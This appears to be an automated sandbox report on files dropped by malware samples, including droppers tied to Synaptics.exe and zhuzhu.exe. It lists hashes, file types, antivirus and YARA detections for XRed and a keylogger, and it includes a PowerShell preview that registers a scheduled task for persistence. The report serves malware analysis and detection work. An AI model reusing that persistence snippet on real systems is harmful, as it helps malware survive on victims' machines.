                                                                                                                                                                    SHA-512:A269C56E8FCD2A55129776A9D94C96571D9CCABBAD4A53BAE29049435B33AE0A19F1E19742D76CA6B43444F7D4124E9941EA60F4166041038012C358E0B98F15
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.264789228479021
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0prSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ur+pAZewRDK4mW
                                                                                                                                                                    MD5:96A97EE60E4D776E4B89CDC974699DD0
                                                                                                                                                                    SHA1:0CBC0E3FB1C325026103E72859523F84A5AB874D
                                                                                                                                                                    SHA-256:2A7E6E006383F4EA604BC20D5D2D922DA428426CB2A1E18D178758A50960D937
                                                                                                                                                                    SHA-512:D42115526331E86593F5D036E505B31993A5A9CE9357216BC484E3CF631CA1465E0CA04D9A6242BF9E1FCB7E4B32F67AF47F964219FE09F2C7B0A0F643F4148B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.256751755486269
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                                                                                                    MD5:9AAE4AACEC6849A607D2D90C34FD0555
                                                                                                                                                                    SHA1:C5107635DDEE0AACDCB36498488BC281DB0BF0D8
                                                                                                                                                                    SHA-256:C706A43E53B0537E2FD335E9D9CDDB095DA57C854BEE5F8BA1C66A8325085BA0
                                                                                                                                                                    SHA-512:2C550774C1BEDA8D8CA49B6098D81C72681D2978BEF3F45479983DEBDE9E4A83710D9CC0053BC976B4556F340FA9B1AC2957E1A25CF7C05A9A516A9895E8749C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.263555790517985
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+04POdSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+jPOd+pAZewRDK4mW
                                                                                                                                                                    MD5:A54C23B4A37FC195FC6D470D192329F7
                                                                                                                                                                    SHA1:64DCD2D0C2AF49FC69C2D5580FBDA68663E897ED
                                                                                                                                                                    SHA-256:BEE5C3D6570B6A2F7936BE8CDDDA9B478DB311D877D837D2B820F4576B016A68
                                                                                                                                                                    SHA-512:702E0FE096CABC534CDE7BA2D7729ABE67E587FC3C01F5365B45E4E680054ABB68D0520F537019B360889ADC1A2AAC9DC58EF9D1EFBAA02121F2729D4F3C4348
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.253697888397771
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0dDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+WD+pAZewRDK4mW
                                                                                                                                                                    MD5:A3A431C22667E876DDAA7115FDD44D4A
                                                                                                                                                                    SHA1:6E8ACF509CC795C8F1043B87FD0CB2A8D88AC0BB
                                                                                                                                                                    SHA-256:490D5BF166B642891370C0C3138FED4483EFFF81EDB666B970BA5A1EB5E1B0B2
                                                                                                                                                                    SHA-512:1C74464CE1CCE1FC45CB4F446A6B16CA78B8358DCC819DAF20AF8E893C95A7C88A1C17D414ACF1D4310E37C8E4A4F5E55A2D92DD8476A934309B31CCE236541E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:PNG image data, 491 x 161, 8-bit colormap, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1556
                                                                                                                                                                    Entropy (8bit):7.507131051649285
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:LZwmgblk3k44Yo4bo4Y4ofXQLo4LoXgMXI7gAgXILs/fHAnzPCpdyIIMGb34oYYI:OpO0P3nfXfX/HXPX/HXai+MGb34Z
                                                                                                                                                                    MD5:402C9D31E2079948E743562CB48AF2A6
                                                                                                                                                                    SHA1:5111E39A19E0675A44369E03D4A82132F0D12977
                                                                                                                                                                    SHA-256:D82DF7AFA80AB17CF1D298488C66902F192034B6BB18176F5BD5C5B74E348E79
                                                                                                                                                                    SHA-512:27510489FAA6562507CBDB0B5F545D9124D6BA59D41A65224DD6089A9C8331279CE83905B26D41453255BDA660FBAAE957E0E17D43350DFCB86603888177C760
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1346052
                                                                                                                                                                    Entropy (8bit):7.9989996832434676
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:24576:S25OCGNlwNr5PL8MqxJTFl9YioVgxuz4Z0dTeLieM1V9QPjQw:B0N2NFL8VB9iiL0dTeOt23
                                                                                                                                                                    MD5:4F688C8A30E46A14A868F07E283763F2
                                                                                                                                                                    SHA1:BA736A93EF1F07B1C7C24F4201B632F1CB18E73A
                                                                                                                                                                    SHA-256:AA02BD7AB8BBF1C1AB138C20D0D7EBB6B5F2E2166E2184405E54D619526E9AC8
                                                                                                                                                                    SHA-512:8A1F679BFA7A1D5667FAC931EF9184CBE76E30C26ED1A63E97CE4AFD8815DC1409EDB560EE91FD3DB57AA0BE10D6C567F43FE887440A09897DE09CD8DC7BA88A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):304652
                                                                                                                                                                    Entropy (8bit):7.999195439763513
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:6144:dl5TTOp1tnABtoSIkutXiC3NxDPYhroRN6AxPM1CKSNEZ4:1TmTAB+XddZAahrKGT
                                                                                                                                                                    MD5:8039C279A02FEA0387E8D51BDDE541D5
                                                                                                                                                                    SHA1:A6A52EF6C01FDE3A1A1C702C41777119DBDB203A
                                                                                                                                                                    SHA-256:0BA9A3E6E4B89ED8C30C092845ECAB5939AFE4C701A130FDC6ECC9D0EC1A8386
                                                                                                                                                                    SHA-512:97F45BF13FF85AD252B46C8E62D2D114E84B3AEF17AA2E3B21CE47B41B416D2000506EE9BFABBC055295817CE6D7D9771A038ACFAE514CCA852EF861751C7254
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):704608
                                                                                                                                                                    Entropy (8bit):6.625840358726942
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:1IhyxJ3BYXF6WxYC2aeHACRYlH+ZOAyTjUnIgidGtAd8Rwb33+YnBsLS683wK9T7:ih8WxYCyYlaOYnliItjRwbH+YBsLS68N
                                                                                                                                                                    MD5:D875875EB3282B692AB10E946EA22361
                                                                                                                                                                    SHA1:34BCEF8A8CB0E1DB44671892AC3CBD74D3C541A8
                                                                                                                                                                    SHA-256:0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
                                                                                                                                                                    SHA-512:972466310D3C145141320584B5F3E431C6888BDA2BA1036F85E68E534ED6FB97BA04CBD46D8D9C401DC5857100DC1BFF1BAD82B50514F3E5C582522F22FD2B5C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: QQyisSetups64.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: wyySetups64.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: A1FsbRkm5m.exe, Detection: malicious, Browse
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1469440
                                                                                                                                                                    Entropy (8bit):6.242110984104102
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:l4LEubC/9euoUCi82BbjSyM5hGfzmzJHXW+U0:UEubUo1i3eymhGfizJHK0
                                                                                                                                                                    MD5:A2FF2C72E739E0CF4C73B623444CA39D
                                                                                                                                                                    SHA1:FF886E63C894A20F30C136A8264CFA33D41B8331
                                                                                                                                                                    SHA-256:C1EB83993C85E01EE6AE84EB6E05744FF8C3CCC02C41D09C22286E3012EF46FC
                                                                                                                                                                    SHA-512:844DAB35A1625D5BF1BD814A36FB80D5670D3DFEE5CF65AD8BE53784B486DCC08898B7577A323C7C7E1E83655F861EA86C5453CFA4C3D55353D329EF3AF6320B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1135682
                                                                                                                                                                    Entropy (8bit):7.510976265913228
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:Q0+G8ZYG6xrKI/ZFfg5Vfg5nfg53x3mYiJ6YJ6MJ6MEJl:QvGJxuI/bfQVfQnfQ3x3TUbhMl
                                                                                                                                                                    MD5:44C8DF596B52856EB1D3FE2E37CBDE4D
                                                                                                                                                                    SHA1:4AADBEEF9DC6CD4CCAC758EBDB852915C09545DF
                                                                                                                                                                    SHA-256:ECDDA2FB9EB27F1B56349E2ABFE90CE2F8741B982A3DD6D248E7D93E6B75DE2C
                                                                                                                                                                    SHA-512:EA94ED1662EFD2F6D91B4D05059DFADD8F290EEDBB45433E33F3B4E3729822A40E0C63D319F2041F3F1738650219200D594CED9E36B558AFF0A494FAB53A0E47
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):28030
                                                                                                                                                                    Entropy (8bit):3.581114835224513
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:E4EuXYuiODQGYuBRrNRrQRrmRrXejXvXH5CeGTNxyqIYuyLmacwrvlCX4uH3OYqm:6nOT+bO7lU51EHWkGHr
                                                                                                                                                                    MD5:8074E9740A0E3CFDA172AD1983C72A05
                                                                                                                                                                    SHA1:B6D006ADAFF1FD059268517B6BD5610EF15D3BA9
                                                                                                                                                                    SHA-256:E4ED337A562AAC81005D451CFD4AEF721CF067ECBC6D1057601AEFC41EE83E26
                                                                                                                                                                    SHA-512:F6680CF19B512060B6ED1C0F88C8EE31A1BE456A37204CB63073E0AC58A2B0F544DCC0DABF0829F28687C2842043D21D41B2F172CB15698316EBF0F2BC89C445
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:PNG image data, 604 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):14344
                                                                                                                                                                    Entropy (8bit):7.934027356242661
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:QTbAFSIp6FghLfaAEYlYifrkou/Z1DTn8O5zV7qh:QTkoIp68SW1Tk1Z1P8O5zch
                                                                                                                                                                    MD5:10AF715DFB97B8A187F81555C8E6068B
                                                                                                                                                                    SHA1:C108E08D53A6EC711F1BA70FDBD7561CE483CBCD
                                                                                                                                                                    SHA-256:EE7F804A1C73B6D6935FF731AE87AEFBBD1ABE16DC5FF315C5D8D91E283C902D
                                                                                                                                                                    SHA-512:FDCA596438FDD60C88DE69367ABC70D6CBFF318D8381EB4155FA257690F26D95C9A13131F676654BED27BE458A6DF67CBE1D713DE9826CF955723F6A92FC5BBB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:PNG image data, 600 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16151
                                                                                                                                                                    Entropy (8bit):7.9414528437087935
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:9SmRt7jn8csHkzjhJuCwQ19rtw5srwat0ADwP0F43ec1:dt7bjsHkBwCwseat0AkdOc1
                                                                                                                                                                    MD5:3641846128E0A27A28CA0DBA8942B896
                                                                                                                                                                    SHA1:88C40C9923AB48E0C01883A773E297541CE49882
                                                                                                                                                                    SHA-256:CBF7CD45FE193E0A438CE14B0176077762E984F897091A682F9E866983DA9174
                                                                                                                                                                    SHA-512:15910E5A279F17EA06618CB8DCBB64FE8F8E6F5061FC14BCA6A92FF2795CF64EACEB2067104358A014079550CA1B4F24200935E2F10B1EDE6622D94794047550
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):165
                                                                                                                                                                    Entropy (8bit):1.4377382811115937
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                                    MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                                    SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                                    SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                                    SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                    Entropy (8bit):3.746897789531007
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                                    MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                                    SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                                    SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                                    SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):151
                                                                                                                                                                    Entropy (8bit):4.741657013789009
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                                                                                    MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                                                                                    SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                                                                                    SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                                                                                    SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                                                                                                                    Process:C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5289240
                                                                                                                                                                    Entropy (8bit):7.236599313454909
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:GgF0ET9HlrxRVwJMACNiREvBvlvwvCvxvq:pZ9HhxRVwJMAqoetRqA9q
                                                                                                                                                                    MD5:B4F00FBA3327488D4CB6FD36B2D567C6
                                                                                                                                                                    SHA1:4F0548A2F6BF73A85FF17F40F420098019AC05FF
                                                                                                                                                                    SHA-256:D6A84954E038DDF4A0026705E0942FC003CFDC04E58F658A6BD9E89C37C57D18
                                                                                                                                                                    SHA-512:C573147ADFEBA7D313CC79498A1C107679F0E69805E3AA8260B3E57DBA282088BCA082536D7866D4708529BF8C3BEF56B2005BD9D59A870E3D29132F6FD3D897
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3342
                                                                                                                                                                    Entropy (8bit):5.500452462399099
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:L4XHDzFRYSqSDzFRYNdXHDwOPxFRYeqqSDwOPxFRYpbqhSDwOPxFRYpbqhSDwOPg:LafkSDfkN13kZD3kE03kE03kE2
                                                                                                                                                                    MD5:AFCCF09B868329FC0CD689E426B77544
                                                                                                                                                                    SHA1:5517B1A57ABE2D2DE9F22390520CAE219CDD3436
                                                                                                                                                                    SHA-256:CC62FAB47CF4EA073AEE9F7588C3A69D749AF91832228940FB5563B54D7D81BF
                                                                                                                                                                    SHA-512:2EEE7F03A38592B51400E8BBFE3FB5D087F9DD3E6470D81F611213E0E672325F76C7C646BCA3BB8BE6E77BE31E4BBB212B71D15ADDE222C8D889DC36B504CB95
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:----------Raised Exception--------------29/12/2024 22:59:01.298----------------..Exception PID=6340 TID=5808 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:48CB03,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)......----------Exception---------------------29/12/2024 22:59:01.298----------------..Exception Code=0x0EEDFADE Flags=0x1 Addr=0x7500CC12 PID=6340 TID=5808 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:7500CC12,0048CB03*2,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)....----------Raised Exception--------------29/12/2024 22:59:01.298----------------..Exception PID=6340 TID=5808 [Main Thread] Build=5157....Failed to access Agent registry settings, while trying to open "SOFTWARE\Xoreax\Incredibuild" ke
                                                                                                                                                                    Process:C:\Users\user\Desktop\zhuzhu.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5289240
                                                                                                                                                                    Entropy (8bit):7.236599313454909
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:GgF0ET9HlrxRVwJMACNiREvBvlvwvCvxvq:pZ9HhxRVwJMAqoetRqA9q
                                                                                                                                                                    MD5:B4F00FBA3327488D4CB6FD36B2D567C6
                                                                                                                                                                    SHA1:4F0548A2F6BF73A85FF17F40F420098019AC05FF
                                                                                                                                                                    SHA-256:D6A84954E038DDF4A0026705E0942FC003CFDC04E58F658A6BD9E89C37C57D18
                                                                                                                                                                    SHA-512:C573147ADFEBA7D313CC79498A1C107679F0E69805E3AA8260B3E57DBA282088BCA082536D7866D4708529BF8C3BEF56B2005BD9D59A870E3D29132F6FD3D897
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\Desktop\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Process:C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3414
                                                                                                                                                                    Entropy (8bit):5.497386323545744
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:L4/YPDzFRYSqpPDzFRYNdCqYPDwOPxFRYmqqfvPDwOPxFRYpTqhfvPDwOPxFRYpd:LFfkSgfkNs3kRW3k013k013k02
                                                                                                                                                                    MD5:8DF876CA67089004FF99717336C057D6
                                                                                                                                                                    SHA1:6B2E69A4D67E8C01C9C7E04F567C45A75A05C795
                                                                                                                                                                    SHA-256:33A69994FABF8A22CE4A1D75E4BDE967915040926E399E539440F4B83BAB3F98
                                                                                                                                                                    SHA-512:420A504019DD6488EEB378E9EDAEBBA0303F426AC73F1C00AB193FF7374794C61D399393EF2EDF518B38D7C9C596697FE0A31E5672A8CE4B0710EBEBA467C559
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:----------Raised Exception--------------29/12/2024 22:58:58.516----------------..Exception PID=3624 TID=5812 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:48CB03,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)......----------Exception---------------------29/12/2024 22:58:58.516----------------..Exception Code=0x0EEDFADE Flags=0x1 Addr=0x7500CC12 PID=3624 TID=5812 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:7500CC12,0048CB03*2,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)....----------Raised Exception--------------29/12/2024 22:58:58.532----------------..Exception PID=3624 TID=5812 [Main Thread] Build=5157....Failed to access Agent registry settings, while trying to open "SOFTWARE\Xoreax\Incredibuild" ke
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):18387
                                                                                                                                                                    Entropy (8bit):7.523057953697544
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                    MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                    SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                    SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                    SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):165
                                                                                                                                                                    Entropy (8bit):1.4377382811115937
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                                    MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                                    SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                                    SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                                    SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):771584
                                                                                                                                                                    Entropy (8bit):6.641700569488142
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IAr:ansJ39LyjbJkQFMhmC+6GD9/
                                                                                                                                                                    MD5:382B0F88502E718DFDF96DBC3AA3400A
                                                                                                                                                                    SHA1:7A3922C6DE7B42483E48644C917ADA5467FD1A44
                                                                                                                                                                    SHA-256:F2927C106573A6D3594AD58A3B5976C9E82964BF4D064821ABE4D3D58EF82479
                                                                                                                                                                    SHA-512:D6F0094332CE7D2C6CBC46B41EA71871DFDB9148F5C5E1C96C8F79E752543A59B6EF85FF6B26148A2ADBB605792392221383624087987BE280DC625A66048E78
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Process:C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4118496
                                                                                                                                                                    Entropy (8bit):7.743814085153487
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
                                                                                                                                                                    MD5:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                    SHA1:6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
                                                                                                                                                                    SHA-256:B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                                                                                                                                                    SHA-512:D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
